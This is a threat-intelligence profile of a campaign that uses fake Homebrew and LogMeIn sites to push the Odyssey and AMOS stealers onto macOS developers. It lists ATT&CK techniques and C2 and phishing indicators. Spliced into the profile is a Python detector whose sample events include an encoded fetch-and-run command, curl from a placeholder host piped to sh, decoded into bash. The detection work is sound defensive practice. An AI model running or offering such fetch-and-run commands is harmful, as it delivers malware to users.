Free, Unbiased, and Open threat intelligence

Odyssey Stealer and AMOS Campaign Targets macOS Developers

Threat Profile

Description

A coordinated campaign targeting macOS users, particularly developers, through fake software download websites that impersonate trusted platforms such as Homebrew, TradingView, and LogMeIn. The campaign relies on social engineering to get the victim to run a base64-encoded command in Terminal, which delivers the Odyssey Stealer or AMOS (Atomic macOS Stealer) malware.
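As an added illustration of the delivery step described above (example code, not part of this profile or of any vendor tooling), the following Python check flags a macOS command line that decodes base64 and hands the result to a shell or osascript, and decodes the blob for triage. The record format, the process names and the example.invalid host are assumptions.

```python
import base64
import re

# Interpreters that would run the decoded text (T1059.002 AppleScript, T1059.004 Unix shell).
INTERPRETERS = re.compile(r"\b(?:bash|sh|zsh|osascript)\b")
# macOS `base64` decodes with -d, -D or --decode; the decode step is the T1027 indicator.
DECODE_FLAG = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")
# The blob is usually passed via echo; requiring 16+ chars avoids flagging short tokens.
BLOB = re.compile(r"echo\s+['\"]?([A-Za-z0-9+/]{16,}={0,2})")

def try_decode(blob):
    """Decode a blob for triage; None if it is not valid base64 or not printable text."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8")
    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass ValueError
        return None
    return text if text.isprintable() else None

def inspect_command(cmdline):
    """Return a finding for a command line that decodes base64 into an interpreter, else None."""
    decode = DECODE_FLAG.search(cmdline)
    if not decode:
        return None
    # Either form: `echo <blob> | base64 -d | bash` or `sh -c "$(echo <blob> | base64 -d)"`.
    piped = INTERPRETERS.search(cmdline[decode.end():]) is not None
    substituted = "$(" in cmdline and INTERPRETERS.search(cmdline) is not None
    if not (piped or substituted):
        return None
    blob = BLOB.search(cmdline)
    return {"command": cmdline, "decoded": try_decode(blob.group(1)) if blob else None}

def scan(events):
    """Run inspect_command over assumed records of the form '<pid> <parent> <command line>'."""
    findings = []
    for line in events:
        _pid, _parent, cmdline = line.split(" ", 2)
        finding = inspect_command(cmdline)
        if finding:
            findings.append(finding)
    return findings

# Constructed sample records (not captured from the campaign); the blob is built here so the
# decoded text is known, and example.invalid is a placeholder host.
ENCODED = base64.b64encode(b"curl -fsSL http://example.invalid/install.sh | sh").decode()
SAMPLE_EVENTS = [
    f"4201 Terminal echo {ENCODED} | base64 -d | bash",
    "4202 Terminal brew install wget",
    "4203 Terminal echo aGVsbG8= | base64 --decode",
    f'4204 Terminal /bin/sh -c "$(echo {ENCODED} | base64 -D)"',
]
```

Only the first and last records are flagged; a plain `brew install` and a decode that never reaches an interpreter are left alone, which keeps the check usable on developer machines where base64 is common.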

MITRE ATT&CK Techniques

T1204.002 - User Execution: Malicious File
T1027 - Obfuscated Files or Information
T1548.003 - Abuse Elevation Control Mechanism: Sudo
T1497 - Virtualization/Sandbox Evasion
T1055 - Process Injection
T1059.002 - Command and Scripting Interpreter: AppleScript
T1059.004 - Command and Scripting Interpreter: Unix Shell
T1071.001 - Application Layer Protocol: Web Protocols
T1583.001 - Acquire Infrastructure: Domains
T1608.001 - Stage Capabilities: Upload Malware
T1566.002 - Phishing: Spearphishing Link
T1082 - System Information Discovery
T1518 - Software Discovery
T1543 - Create or Modify System Process
T1562.001 - Impair Defenses: Disable or Modify Tools

Related Entities

Indicators of Compromise (10)

sites-phantom.com - Phishing infrastructure domain
homebrewclubs.org - Phishing domain impersonating Homebrew package manager
homebrewfaq.org - Phishing domain impersonating Homebrew package manager
45.146.130.132 - Odyssey Stealer C2 server
45.135.232.33 - Odyssey Stealer C2 server
45.146.130.131 - Odyssey Stealer C2 server
bonoud.com - Payload hosting domain serving installer scripts
88.214.50.3 - Odyssey Stealer C2 server
93.152.230.79 - Primary C2 infrastructure server hosting phishing pages and payloads
logmeln.com - Phishing domain impersonating LogMeIn

Metadata

Published

7 months ago
